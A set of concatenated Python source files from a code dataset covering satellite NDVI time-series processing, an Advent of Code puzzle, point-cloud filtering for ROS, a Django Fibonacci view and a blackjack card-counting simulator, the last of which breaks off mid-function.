(\n landsat_num - len(time_ndvi_result) + sentinel_num - sentinel_invaild_num\n )\n print(\n \"Total find %s landsat data and %s invaild.\"\n % (landsat_num, landsat_invaild_num)\n )\n\n return time_ndvi_result\n\n\ndef aoi_process_timing(data_index): # 处理aoi时序NDVI\n \"\"\"\n data_index = 所有测试文件路径,之后有李磊直接返回\n \"\"\"\n\n \"\"\"时序处理\"\"\"\n time_ndvi = timingNDVI()\n time_ndvi_result = []\n\n sentinel_data = data_index.sentinel_data\n landsat_data = data_index.landsat_data\n data_index = None\n\n for L in sentinel_data:\n ndvi_result = time_ndvi._read_roi_data(roi, L)\n if ndvi_result is None:\n continue\n else:\n time_ndvi_result.append(ndvi_result)\n\n for L in landsat_data:\n ndvi_result = time_ndvi._read_roi_data(roi, L)\n if ndvi_result is None:\n continue\n else:\n time_ndvi_result.append(ndvi_result)\n return time_ndvi_result\n\n\ndef load_json(json_file_path):\n with open(json_file_path, \"r\") as fp:\n tmp = json.load(fp)\n return tmp\n\n\ndef save_json(json_file_path, file_dict):\n with open(json_file_path, \"w\") as fp:\n json.dump(file_dict, fp, ensure_ascii=True, indent=2)\n\n\nif __name__ == \"__main__\":\n\n \"\"\"----------------------------------点时序测试----------------------------------\"\"\"\n\n start = time.time() # 计时\n testpoint = os.path.expanduser(\"~/data_pool/X_tmp/test_points2.geojson\")\n data_index = RawDataIndex(testpoint) # 实例化提取文件\n data_index.extract_data_path() # 执行提出文件\n time_ndvi_result = point_process_timing(data_index) # 传入参数,进行计算\n\n # save data\n json_path = \"/home/tq/data_pool/X_tmp/test_points2.json\"\n save_json(json_path, time_ndvi_result)\n time_ndvi_result = load_json(json_path)\n print(\"\\nTotal %d point.\" % len(time_ndvi_result))\n # point_show(time_ndvi_result) # 结果显示\n\n end = time.time()\n print(end - start)\n\n \"\"\"----------------------------------ROI测试----------------------------------\"\"\"\n \"\"\"\n start = time.time() #计时\n # 处理序列ndvi\n \n roi = ([(116.797583649995, 40.0908842923383),\n (116.797927890475, 40.0880615643335),\n (116.802656544897, 40.0881352110320),\n (116.80214035494, 40.09062933034380),\n (116.797583649995, 40.0908842923383)])\n\n L1 = data_path = r'D:\\WorkSpace\\testData\\sentinel\\tiles\\50\\T\\MK\\2017\\11\\4'\n L2 = data_path = r'D:\\WorkSpace\\testData\\sentinel\\tiles\\50\\T\\MK\\2017\\11\\6'\n L3 = data_path = r'D:\\WorkSpace\\testData\\sentinel\\tiles\\50\\T\\MK\\2017\\11\\11'\n \n time_ndvi = timingNDVI()\n time_ndvi_result = []\n for L in [L1, L2, L3]:\n ndvi_result = time_ndvi._read_roi_data(roi, L)\n time_ndvi_result.append(ndvi_result)\n end = time.time()\n print(end-start)\n \"\"\"\n\n \"\"\"----------------------------------ROI时序测试----------------------------------\"\"\"\n # start = time.time() #计时\n\n # # 处理序列ndvi,test7,测试3\n # \"\"\"\n # roi = ([(116.797583649995, 40.0908842923383),\n # (116.797927890475, 40.0880615643335),\n # (116.802656544897, 40.0881352110320),\n # (116.80214035494, 40.09062933034380),\n # (116.797583649995, 40.0908842923383)])\n\n # \"\"\"\n # #问题3的区域,nb,区域2\n\n # roi = ([(-96.6201167117106, 40.5959476409038),\n # (-96.6200780868530, 40.5890096441085),\n # (-96.6201038363215, 40.5853660111447),\n # (-96.6109843256709, 40.5853171238444),\n # (-96.6109414103266, 40.5881199380235),\n # (-96.6129584315059, 40.5881688232751),\n # (-96.6129155161616, 40.5905478623315),\n # (-96.6109628679988, 40.5905641568277),\n # (-96.6109371185303, 40.5922196570490),\n # (-96.6108512878418, 40.5960095547692),\n # (-96.6201167117106, 40.5959476409038)])\n\n # \"\"\"初始化路径类\"\"\"\n # data_index = RawDataIndex()\n # data_index.extract_data_path() # 执行提出文件\n\n # time_ndvi_result = aoi_process_timing(data_index)\n # end = time.time()\n # print(end-start)\n\n # display the result\n # start = time.time() # 计时\n # json_path = \"/home/tq/data_pool/X_tmp/test_points2.json\"\n # time_ndvi_result = load_json(json_path)\n # print(\"\\nTotal %d point.\" % len(time_ndvi_result))\n # point_show(time_ndvi_result) # 结果显示\n\n # end = time.time()\n # print(end - start)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"92997154","text":"#!/usr/bin/env python\n\nfrom functools import reduce\n\ndef solve():\n with open(\"input.txt\") as input_file:\n lines = input_file.readlines()\n numbers = [int(num) for num in lines]\n candidates = [\n (x, y, z)\n for x in numbers\n for y in numbers\n for z in numbers\n ]\n print(f\"part2.results_length: {len(candidates)}\")\n solution = list(filter(lambda el: el[0] + el[1] + el[2] == 2020, candidates))\n print(f\"part2.solution: {solution}\")\n \n\n return reduce(lambda a,b: a*b, solution[0])\n\nif __name__ == \"__main__\":\n solve()\n","sub_path":"adventofcode/one/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"583821433","text":"#!/usr/bin/env python\n\n# Author(s): Smruti Panigrahi\n\n# Import modules\nimport rospy\nimport pcl\nimport numpy as np\nimport ctypes\nimport struct\nimport sensor_msgs.point_cloud2 as pc2\n\nimport pcl_helper as pclh\nfrom sensor_msgs.msg import PointCloud2, PointField\nfrom std_msgs.msg import Header\nfrom random import randint\n\n\n\n\n# Statistical outlier filter\ndef statistical_filter_example():\n '''\n -*- coding: utf-8 -*-\n port of\n http://pointclouds.org/documentation/tutorials/statistical_outlier.php\n you need to download\n http://svn.pointclouds.org/data/tutorials/table_scene_lms400.pcd\n '''\n p = pcl.load(\"table_scene_lms400.pcd\")\n\n fil = p.make_statistical_outlier_filter()\n\n fil.set_mean_k(50)\n fil.set_std_dev_mul_thresh(1.0)\n pcl.save(fil.filter(), \"table_scene_lms400_inliers.pcd\")\n\n fil.set_negative(True)\n pcl.save(fil.filter(), \"table_scene_lms400_outliers.pcd\")\n\n\n# Statistical outlier filter\ndef statistical_outlier_filter(cloud, mean_k=50, std_dev_mul_thresh=0.1):\n # Create a Statistical Outlier Filter object to remove unwanted noise in point cloud\n sof = cloud.make_statistical_outlier_filter()\n\n sof.set_mean_k(mean_k)\n sof.set_std_dev_mul_thresh(std_dev_mul_thresh)\n \n filtered_inliers = sof.filter()\n #filename1 = 'table_filtered_statistical_inliers.pcd'\n #pcl.save(filtered_inliers, filename1)\n \n sof.set_negative(True)\n filtered_outliers = sof.filter()\n #filename2 = 'table_filtered_statistical_outliers.pcd'\n #pcl.save(filtered_outliers, filename2)\n\n return filtered_inliers, filtered_outliers\n\n\n# Voxel-grid down-sampling filter\ndef voxel_downsampling(cloud, LEAF_SIZE=0.005):\n # Create a VoxelGrid filter object for our input point cloud\n vox = cloud.make_voxel_grid_filter()\n # Set the voxel (or leaf) size \n vox.set_leaf_size(LEAF_SIZE, LEAF_SIZE, LEAF_SIZE)\n # Call the filter function to obtain the resultant downsampled point cloud\n cloud_filtered = vox.filter()\n #filename = 'voxel_downsampled.pcd'\n #pcl.save(cloud_filtered, filename)\n return cloud_filtered\n\n\n# Pass-through filter\ndef pass_through_filter(cloud_vox_filtered, axis_min=0.77, axis_max=1.1, filter_axis='z'):\n # Create a PassThrough filter object to create a bounding box\n cloud_psf = cloud_vox_filtered.make_passthrough_filter()\n cloud_psf.set_filter_field_name(filter_axis)\n cloud_psf.set_filter_limits(axis_min, axis_max)\n\n # Finally use the filter function to obtain the resultant point cloud. \n cloud_filtered = cloud_psf.filter()\n #filename = 'cloud_psf.pcd'\n #pcl.save(cloud_filtered, filename)\n return cloud_filtered\n\n\n# RANSAC plane segmentation\ndef ransac(cloud_psf, max_distance=0.01):\n # Create the segmentation object\n seg = cloud_psf.make_segmenter()\n\n # Set the model you wish to fit\n seg.set_model_type(pcl.SACMODEL_PLANE)\n seg.set_method_type(pcl.SAC_RANSAC)\n \n seg.set_distance_threshold(max_distance)\n\n # Call the segment function to obtain set of inlier indices and model coefficients\n inliers, coefficients = seg.segment()\n\n # Extract inliers\n extracted_inliers = cloud_psf.extract(inliers, negative=False)\n #filename = 'extracted_inliers.pcd'\n #pcl.save(extracted_inliers, filename) # Save pcd for table\n\n # Extract outliers\n extracted_outliers = cloud_psf.extract(inliers, negative=True)\n #filename = 'extracted_outliers.pcd'\n #pcl.save(extracted_outliers, filename) # Save pcd for tabletop objects\n\n return extracted_inliers, extracted_outliers\n\n\n# Euclidean clustering algorithm to segment the RANSAC inlier points into individual objects.\ndef euclidean_clustering(cloud):\n # Convert XYZRGB point cloud to XYZ since EC uses spatial info only\n cloud_xyz = pclh.XYZRGB_to_XYZ(cloud)\n # Use k-d tree to decrease the computational burden of searching for neighboring points\n tree = cloud_xyz.make_kdtree()\n # Create a cluster extraction object\n ec = cloud_xyz.make_EuclideanClusterExtraction()\n # Set tolerances for distance threshold \n # as well as minimum and maximum cluster size (in points)\n # NOTE: These are poor choices of clustering parameters\n # Your task is to experiment and find values that work for segmenting objects.\n ec.set_ClusterTolerance(0.01)\n ec.set_MinClusterSize(10)\n ec.set_MaxClusterSize(10000)\n # Search the k-d tree for clusters\n ec.set_SearchMethod(tree)\n # Extract indices for each of the discovered clusters\n cluster_indices = ec.Extract()\n\n return cluster_indices\n\n\ndef visualize_clusters(cloud, cluster_indices):\n #cloud_xyz = pclh.XYZRGB_to_XYZ(cloud)\n #Assign a color corresponding to each segmented object in scene\n cluster_color = pclh.get_color_list(len(cluster_indices))\n color_cluster_point_list = []\n for j, indices in enumerate(cluster_indices):\n color = pclh.rgb_to_float(cluster_color[j])\n for idx in indices:\n p = cloud[idx]\n color_cluster_point_list.append([p[0], p[1], p[2], color])\n\n #Create new cloud containing all clusters, each with unique color\n cluster_cloud = pcl.PointCloud_PointXYZRGB()\n cluster_cloud.from_list(color_cluster_point_list)\n\n return cluster_cloud\n\n\n\ndef main(): \n # Run the following on command line inside the folder where the .pcd file resides\n # pcl_viewer tabletop.pcd\n\n # Load Point Cloud file\n cloud = pcl.load('tabletop.pcd')\n\n stat_inliers, stat_outliers = statistical_outlier_filter(cloud)\n clFil = voxel_downsampling(stat_inliers)\n psFil = pass_through_filter(clFil)\n RANSAC_inliers, RANSAC_outliers = ransac(psFil)\n #statistical_filter_example()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"sensor_stick/scripts/filtering.py","file_name":"filtering.py","file_ext":"py","file_size_in_byte":5715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"301468985","text":"import re\nimport time\nfrom django.shortcuts import render_to_response, RequestContext, Http404, redirect\nfrom django.contrib import messages \n\nfrom .models import NthFibo\nfrom .forms import NthNumberForm\n\ndef get_nth_fibo(n):\n '''\n function to get nth number in fibonacci sequence\n '''\n first, second, result = 0, 1, 0\n if n == 0:\n return first\n for _ in xrange(2, n+1):\n result = first + second\n first = second\n second = result\n return second\n\ndef nth_number(request):\n start_time = time.time()\n nform = NthNumberForm()\n if request.method == 'POST':\n nform = NthNumberForm(request.POST) \n if nform.is_valid():\n n = nform.cleaned_data['n']\n if re.match('^[0-9]+$', n) and not re.match('^-[0-9]+$', n):\n if NthFibo.objects.filter(n=n).exists():\n ans = NthFibo.objects.get(n=n).answer\n else:\n ans = get_nth_fibo(int(n))\n NthFibo.objects.create(n=n, answer=str(ans))\n calc_time = (time.time() - start_time) / 1000.0\n return render_to_response(\"solver/answer.html\", locals(), context_instance=RequestContext(request))\n else:\n messages.error(request, \"Invalid Input\")\n return redirect('nth_number') \n else:\n messages.error(request, \"There was an error with your number\")\n return redirect('nth_number') \n else:\n return render_to_response(\"solver/find.html\", locals(), context_instance=RequestContext(request))\n","sub_path":"solver/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"179668981","text":"import random\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n\r\nclass Card(object):\r\n \"\"\"Create a playing card object\r\n \"\"\"\r\n suit_names = [\"Joker\",\"Diamonds\",\"Clubs\",\"Hearts\",\"Spades\"]\r\n rank_names = ['Joker','Ace','2','3','4','5','6','7','8','9','10','Jack','Queen','King']\r\n \r\n def __init__(self,suit=0,rank=0):\r\n \"create a new card\"\r\n self.suit = suit\r\n self.rank = rank\r\n self.rankname = Card.rank_names[self.rank]\r\n\r\n def __str__(self):\r\n \"returns a string represenatation of the card created\"\r\n return '%s of %s' %(Card.rank_names[self.rank],Card.suit_names[self.suit])\r\n\r\n def __repr__(self):\r\n \"returns a string represenatation of the card created\"\r\n return '%s of %s' %(Card.rank_names[self.rank],Card.suit_names[self.suit])\r\n\r\n\r\nclass Deck(object):\r\n \"Create a Full Deck of Cards\"\r\n\r\n def __init__(self,inc_jok = False):\r\n self.rand = random.Random()\r\n self.inc_jok = inc_jok\r\n self.deck_of_cards = []\r\n if self.inc_jok == True:\r\n for i in range(1,5): \r\n for j in range(1,14):\r\n card = Card(i,j)\r\n self.deck_of_cards.append(card)\r\n self.deck_of_cards.append(Card(0,0))\r\n self.deck_of_cards.append(Card(0,0))\r\n elif self.inc_jok == False:\r\n for i in range(1,5):\r\n for j in range(1,14):\r\n card = Card(i,j)\r\n self.deck_of_cards.append(card)\r\n\r\n def __str__(self):\r\n string_cards = []\r\n for i in self.deck_of_cards:\r\n string_cards.append(str(i))\r\n return '\\n'.join(string_cards)\r\n\r\n def __repr__(self):\r\n string_cards = []\r\n for i in self.deck_of_cards:\r\n string_cards.append(str(i))\r\n return '\\n'.join(string_cards) \r\n\r\n def shuffle(self,random_seed = 42,set_seed = False):\r\n if set_seed == True:\r\n self.rand = random.Random(random_seed) \r\n self.rand = random.Random(random_seed) \r\n self.rand.shuffle(self.deck_of_cards)\r\n\r\n def add_card(self,card):\r\n self.deck_of_cards.append(card)\r\n\r\n def remove_card(self,card):\r\n self.deck_of_cards.remove(card)\r\n\r\n def pop_card(self,i=-1):\r\n return self.deck_of_cards.pop(i)\r\n\r\n def deal_card(self,hand,num):\r\n \"Deals number of cards to a given hand\"\r\n if num == 1:\r\n card = self.pop_card()\r\n hand.add_card(card)\r\n cards_dealt = card\r\n\r\n else:\r\n cards_dealt = []\r\n for i in range(num):\r\n card = self.pop_card()\r\n hand.add_card(card)\r\n cards_dealt.append(card)\r\n\r\n return cards_dealt\r\n\r\nclass Hand(Deck):\r\n \"\"\"Creates a hand of playing cards.\"\"\"\r\n \r\n def __init__(self, label=''):\r\n self.deck_of_cards = []\r\n self.label = label\r\n\r\n def __str__(self):\r\n return self.label + ' currently has hand \\n' + str(self.deck_of_cards) \r\n\r\n def update_label(self,newlabel):\r\n self.label = newlabel\r\n\r\n\r\n\r\nclass Blackjack():\r\n \r\n \"\"\"Sets up a game of Blackjack\"\"\"\r\n bet_tables_no_ace = []\r\n for row in range(22):\r\n if row >= 0 and row <=4:\r\n temp = ['Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit']\r\n bet_tables_no_ace.append(temp)\r\n elif row >= 5 and row <= 8:\r\n temp = ['Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit']\r\n bet_tables_no_ace.append(temp)\r\n elif row == 9:\r\n temp = ['Hit','Hit','Hit','Double','Double','Double','Double','Hit','Hit','Hit','Hit']\r\n bet_tables_no_ace.append(temp)\r\n elif row == 10:\r\n temp = ['Double','Hit','Double','Double','Double','Double','Double','Double','Double','Double','Hit']\r\n bet_tables_no_ace.append(temp)\r\n elif row == 11:\r\n temp = ['Double','Double','Double','Double','Double','Double','Double','Double','Double','Double','Double']\r\n bet_tables_no_ace.append(temp)\r\n elif row == 12:\r\n temp = ['Hit','Hit','Hit','Hit','Stand','Stand','Stand','Hit','Hit','Hit','Hit']\r\n bet_tables_no_ace.append(temp)\r\n elif row >= 13 and row <= 16:\r\n temp = ['Stand','Hit','Stand','Stand','Stand','Stand','Stand','Hit','Hit','Hit','Hit']\r\n bet_tables_no_ace.append(temp)\r\n elif row >= 17:\r\n temp = ['Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand']\r\n bet_tables_no_ace.append(temp)\r\n\r\n bet_tables_ace = []\r\n for row in range(14):\r\n if row >= 0 and row <=3:\r\n temp = ['Hit','Hit','Hit','Hit','Hit','Double','Double','Hit','Hit','Hit','Hit']\r\n bet_tables_ace.append(temp)\r\n elif row == 4 or row == 5:\r\n temp = ['Hit','Hit','Hit','Hit','Double','Double','Double','Hit','Hit','Hit','Hit']\r\n bet_tables_ace.append(temp)\r\n elif row == 6:\r\n temp = ['Hit','Hit','Hit','Double','Double','Double','Double','Hit','Hit','Hit','Hit']\r\n bet_tables_ace.append(temp)\r\n elif row == 7:\r\n temp = ['Hit','Hit','Double','Double','Double','Double','Double','Stand','Stand','Hit','Hit']\r\n bet_tables_ace.append(temp)\r\n elif row == 8:\r\n temp = ['Stand','Stand','Stand','Stand','Stand','Stand','Double','Stand','Stand','Stand','Stand']\r\n bet_tables_ace.append(temp)\r\n elif row >=9 and row <=13:\r\n temp = ['Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand']\r\n bet_tables_ace.append(temp)\r\n\r\n bet_tables_pairs = []\r\n for row in range(14):\r\n if row == 1 or row == 0:\r\n temp = ['Split','Split','Split','Split','Split','Split','Split','Split','Split','Split','Split']\r\n bet_tables_pairs.append(temp)\r\n elif row == 2 or row == 3:\r\n temp = ['Split','Hit','Split','Split','Split','Split','Split','Split','Hit','Hit','Hit']\r\n bet_tables_pairs.append(temp)\r\n elif row == 4:\r\n temp = ['Hit','Hit','Hit','Hit','Hit','Split','Split','Hit','Hit','Hit','Hit']\r\n bet_tables_pairs.append(temp)\r\n elif row == 5:\r\n temp = ['','','','','','','','','','','']\r\n bet_tables_pairs.append(temp)\r\n elif row == 6:\r\n temp = ['Split','Hit','Split','Split','Split','Split','Split','Hit','Hit','Hit','Hit']\r\n bet_tables_pairs.append(temp)\r\n elif row == 7:\r\n temp = ['Split','Hit','Split','Split','Split','Split','Split','Split','Hit','Hit','Hit']\r\n bet_tables_pairs.append(temp)\r\n elif row == 8:\r\n temp = ['Split','Split','Split','Split','Split','Split','Split','Split','Split','Split','Split']\r\n bet_tables_pairs.append(temp)\r\n elif row == 9:\r\n temp = ['Hit','Stand','Split','Split','Split','Split','Split','Stand','Split','Split','Stand']\r\n bet_tables_pairs.append(temp)\r\n elif row >= 10 and row <=13:\r\n temp = ['Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand']\r\n bet_tables_pairs.append(temp)\r\n\r\n surrender_table = []\r\n for row in range(22):\r\n empty = ['0','1','2','3','4','5','6','7','8','9','10']\r\n surrender_table.append(empty)\r\n\r\n def __init__(self,num_of_players = 1,num_of_decks = 6,use_surrender = True,use_count = True,use_count_multiplier = True,soft17hit = True,penetration_point = .1,random_seed = 42): #,num_of_players=1,num_of_decks=1): \r\n self.num_of_players = num_of_players\r\n self.num_of_decks = num_of_decks\r\n self.hand_scores = [ [[]] for i in range(self.num_of_players+1)]\r\n self.round_scores = [0,0]\r\n self.discardpile = Hand('Discard Pile')\r\n self.decks = []\r\n self.players = []\r\n self.did_double = [ [False] for i in range(self.num_of_players+1)]\r\n self.count = 0\r\n self.true_count = 0\r\n self.winnings = 0.0\r\n self.bet = 10.0\r\n self.count_multiplier = 1\r\n self.surrendered = [ [False] for i in range(self.num_of_players+1)]\r\n self.Insurance = False\r\n self.use_surrender_variable = use_surrender\r\n\r\n self.blackjack_count = 0\r\n\r\n self.surrender_count = 0\r\n self.double_count = 0\r\n self.split_count = 0\r\n self.insurance_count = 0\r\n self.use_count = use_count\r\n self.use_count_multiplier = use_count_multiplier\r\n self.soft17hit = soft17hit\r\n\r\n self.dealer_bust_count = 0\r\n\r\n self.soft17 = False\r\n self.prints = False\r\n self.count_array = []\r\n self.reshuffle_total = 0\r\n self.expected_count = 0\r\n self.start_value = 0\r\n self.penetration_point = int(penetration_point*num_of_decks*52)\r\n self.max_count_array = []\r\n self.mean_count_array = []\r\n self.random_seed = random_seed\r\n self.winnings_array = [0.0]\r\n self.round_count = [1]\r\n self.count_array_tracker = [0]\r\n\r\n self.deck = Deck(False)\r\n for i in range(self.num_of_decks-1):\r\n d = Deck(False)\r\n d.deal_card(self.deck,len(d.deck_of_cards))\r\n \r\n self.deck.shuffle(self.random_seed,True)\r\n\r\n dealer = [Hand('Dealer')]\r\n self.players.append(dealer)\r\n for i in range(self.num_of_players):\r\n j = i + 1\r\n label = 'Player %s' %(str(j))\r\n self.player = [Hand(label)]\r\n self.players.append(self.player)\r\n\r\n self.variations(self.true_count,self.use_count)\r\n self.use_surrender(self.use_surrender_variable)\r\n\r\n def deal(self):\r\n\r\n for i in range(2):\r\n j = 1\r\n while j <= self.num_of_players:\r\n self.count_card(self.deck.deal_card(self.players[j][0],1))\r\n j = j+1\r\n\r\n self.deck.deal_card(self.players[0][0],1)\r\n\r\n\r\n\r\n def __str__(self):\r\n return 'Current hands won: \\n Dealer: %s \\n Player 1: %s' %(str(self.scores[0]),str(self.scores[1]))\r\n \r\n def ace_check(self,s = 0,h = []):\r\n if s > 21:\r\n for i,val in enumerate(h):\r\n if val == 11:\r\n val = 1\r\n h[i] = val\r\n return h\r\n\r\n def blackjack_check(self,score,playernumber,handnumber = 0):\r\n if len(self.players[playernumber]) == 1:\r\n if score == 21 and len(self.players[playernumber][handnumber].deck_of_cards) == 2:\r\n score = 'Blackjack'\r\n return score\r\n\r\n def total_hand(self,playernumber,handnumber = 0):\r\n score = 0\r\n\r\n temp_hand_scores = []\r\n for card in self.players[playernumber][handnumber].deck_of_cards:\r\n \r\n rankname = card.rankname\r\n\r\n if rankname == 'Jack' or rankname == 'Queen' or rankname == 'King' :\r\n rank = 10\r\n elif rankname == 'Ace':\r\n rank = 11\r\n else:\r\n rank = card.rank\r\n\r\n temp_hand_scores.append(rank)\r\n\r\n self.hand_scores[playernumber][handnumber] = temp_hand_scores\r\n\r\n score = sum(self.hand_scores[playernumber][handnumber])\r\n while score > 21 and 11 in self.hand_scores[playernumber][handnumber]:\r\n newhand = self.ace_check(score,self.hand_scores[playernumber][handnumber])\r\n self.hand_scores[playernumber][handnumber] = newhand\r\n score = sum(self.hand_scores[playernumber][handnumber])\r\n \r\n if score == 17 and 11 in self.hand_scores[0][0] and playernumber == 0:\r\n self.soft17 = True\r\n\r\n if playernumber == 0 and score >21:\r\n score = 0\r\n\r\n elif playernumber > 0 and score > 21:\r\n score = -1\r\n\r\n return score\r\n\r\n def play_round(self,num_of_rounds = 1):\r\n #for k in range(num_of_rounds):\r\n self.one_shuffle = 0\r\n while self.one_shuffle == 0:\r\n if self.use_count_multiplier == True:\r\n if self.num_of_decks == 1:\r\n if self.true_count <= 1:\r\n self.count_multiplier = 1.0\r\n elif self.true_count == 2:\r\n self.count_multiplier = 2.0\r\n elif self.true_count == 3:\r\n self.count_multiplier = 3.0\r\n elif self.true_count >= 4:\r\n self.count_multiplier = 4.0\r\n\r\n elif self.num_of_decks == 2: \r\n if self.true_count <= 1:\r\n self.count_multiplier = 1.0\r\n elif self.true_count == 2:\r\n self.count_multiplier = 2.0\r\n elif self.true_count == 3:\r\n self.count_multiplier = 3.0\r\n elif self.true_count == 4:\r\n self.count_multiplier = 4.0\r\n elif self.true_count == 5:\r\n self.count_multiplier = 5.0\r\n elif self.true_count >= 6:\r\n self.count_multiplier = 6.0 \r\n elif self.num_of_decks >=3: \r\n if self.true_count <= 1:\r\n self.count_multiplier = 1.0\r\n elif self.true_count == 2:\r\n self.count_multiplier = 2.0\r\n elif self.true_count == 3:\r\n self.count_multiplier = 4.0\r\n elif self.true_count == 4:\r\n self.count_multiplier = 8.0\r\n elif self.true_count >= 5:\r\n self.count_multiplier = 12.0\r\n \r\n else:\r\n self.count_multiplier = 1.0\r\n\r\n total_high_cards = 0\r\n total_low_cards = 0\r\n for card in self.deck.deck_of_cards:\r\n if card.rank == 1 or card.rank >= 10:\r\n total_high_cards = total_high_cards+1\r\n if card.rank >= 2 and card.rank<= 6:\r\n total_low_cards = total_low_cards+1\r\n\r\n current_value = total_low_cards-total_high_cards\r\n self.expected_count = self.start_value-current_value\r\n \r\n temp = [0,0,0,0,0]\r\n temp[0] = self.count\r\n temp[1] = self.true_count\r\n temp[2] = self.count_multiplier\r\n temp[3] = self.expected_count\r\n temp[4] = len(self.deck.deck_of_cards)\r\n self.count_array.append(temp)\r\n\r\n \r\n if len(self.deck.deck_of_cards) < self.penetration_point:\r\n self.discardpile.deal_card(self.deck,len(self.discardpile.deck_of_cards))\r\n self.deck.shuffle(self.random_seed,False)\r\n self.count = 0\r\n self.true_count = 0\r\n self.reshuffle_total = self.reshuffle_total + 1\r\n max_count_all = np.max(self.count_array,axis = 0)\r\n max_count = max_count_all[1]\r\n self.max_count_array.append(max_count)\r\n mean_count_all = np.mean(self.count_array,axis = 0)\r\n mean_count = mean_count_all[1]\r\n self.mean_count_array.append(mean_count)\r\n self.count_array = []\r\n self.one_shuffle = 1\r\n break\r\n self.deal()\r\n\r\n self.dealer_shows = self.players[0][0].deck_of_cards[1]\r\n self.count_card(self.dealer_shows)\r\n\r\n self.check_insurance(self.dealer_shows)\r\n\r\n scoreDealer = self.total_hand(0,0)\r\n score1 = self.total_hand(1,0)\r\n scoreDealer = self.blackjack_check(scoreDealer,0,0)\r\n score1 = self.blackjack_check(score1,1,0)\r\n \r\n splitblackpossible = False\r\n\r\n if self.players[1][0].deck_of_cards[1] == self.players[0][0].deck_of_cards[0] \\\r\n and (\r\n self.players[1][0].deck_of_cards[1].rank == 10 \\\r\n or self.players[1][0].deck_of_cards[1].rank == 1\r\n ):\r\n splitblackpossible = True\r\n \r\n\r\n skip = False\r\n if scoreDealer == 'Blackjack' and splitblackpossible == False:\r\n skip = True\r\n if score1 == 'Blackjack':\r\n skip = True\r\n\r\n if skip == False:\r\n self.variations(self.true_count,self.use_count)\r\n ace_split = self.check_split(1)\r\n for n in range(len(self.players[1])):\r\n score1 = score1 = self.total_hand(1,n)\r\n self.variations(self.true_count,self.use_count)\r\n strat1 = self.strategy(1,n,score1)\r\n if strat1 == 'Surrender' and ace_split == False:\r\n self.action(strat1,1,n)\r\n self.surrendered[1][n] = True\r\n\r\n while strat1 != 'Stand' and self.surrendered[1][n] == False and ace_split == False:\r\n if strat1 == 'Double':\r\n self.action(strat1,1,n)\r\n break\r\n self.action(strat1,1,n)\r\n score1 = self.total_hand(1,n)\r\n self.variations(self.true_count,self.use_count)\r\n strat1 = self.strategy(1,n,score1)\r\n\r\n if self.soft17hit == False: \r\n while scoreDealer<17 and scoreDealer>0 and score1 != -1:\r\n self.count_card(self.deck.deal_card(self.players[0][0],1))\r\n scoreDealer = self.total_hand(0,0)\r\n\r\n if scoreDealer == 0:\r\n self.dealer_bust_count = self.dealer_bust_count + 1\r\n elif self.soft17hit == True:\r\n while ((scoreDealer<17 and scoreDealer>0 and score1!=-1) or self.soft17 == True)and score1 != -1 :\r\n if self.soft17 == True:\r\n self.soft17 = False\r\n self.count_card(self.deck.deal_card(self.players[0][0],1))\r\n scoreDealer = self.total_hand(0,0)\r\n\r\n if scoreDealer == 0:\r\n self.dealer_bust_count = self.dealer_bust_count + 1\r\n\r\n for n in range(len(self.players[1])):\r\n score1 = self.total_hand(1,n)\r\n score1 = self.blackjack_check(score1,1,0)\r\n\r\n if score1 == 'Blackjack' and scoreDealer != 'Blackjack':\r\n self.round_scores[1] = self.round_scores[1]+1\r\n self.winnings = self.winnings + 1.5*self.bet*self.count_multiplier\r\n self.blackjack_count = self.blackjack_count+1\r\n\r\n elif score1 != 'Blackjack' and scoreDealer == 'Blackjack':\r\n self.round_scores[0] = self.round_scores[0]+1\r\n self.winnings = self.winnings - self.bet*self.count_multiplier*(1.0-self.Insurance)\r\n\r\n elif score1 == 'Blackjack' and scoreDealer == 'Blackjack':\r\n #tie\r\n self.blackjack_count = self.blackjack_count+1\r\n\r\n elif self.surrendered[1][n] == True:\r\n self.round_scores[0] = self.round_scores[0]+1\r\n self.winnings = self.winnings - self.bet*self.count_multiplier*0.5\r\n \r\n elif scoreDealer>score1:\r\n self.round_scores[0] = self.round_scores[0]+1\r\n self.winnings = self.winnings - self.bet*(self.did_double[1][n] * 1.0 + 1.0)*self.count_multiplier\r\n \r\n elif scoreDealer 1:\r\n self.players[i].pop()\r\n self.hand_scores[i].pop()\r\n self.did_double[i].pop()\r\n self.surrendered[i].pop()\r\n\r\n self.did_double[i][0] = False\r\n self.surrendered[1][0] = False\r\n\r\n def strategy(self,playernumber,handnumber = 0,score = -1):\r\n deal_shows_rank = self.dealer_shows.rank\r\n if deal_shows_rank >= 10:\r\n deal_shows = 10\r\n else:\r\n deal_shows = deal_shows_rank\r\n\r\n strat = ''\r\n\r\n if len(self.players[playernumber][handnumber].deck_of_cards) == 2 and self.use_surrender_variable == True:\r\n strat = Blackjack.surrender_table[score][deal_shows]\r\n\r\n if strat == 'Surrender':\r\n stophere = True\r\n self.surrender_count = self.surrender_count+1\r\n\r\n elif len(self.players[playernumber][handnumber].deck_of_cards) == 2 \\\r\n and (self.players[playernumber][handnumber].deck_of_cards[0].rank == \\\r\n self.players[playernumber][handnumber].deck_of_cards[1].rank ) \\\r\n and (self.players[playernumber][handnumber].deck_of_cards[0].rank != 5):\r\n strat = self.bet_tables_pairs_var[self.players[playernumber][handnumber].deck_of_cards[0].rank][deal_shows] \r\n \r\n elif 11 in self.hand_scores[playernumber][handnumber]:\r\n no_ace_score = score - 11\r\n strat = 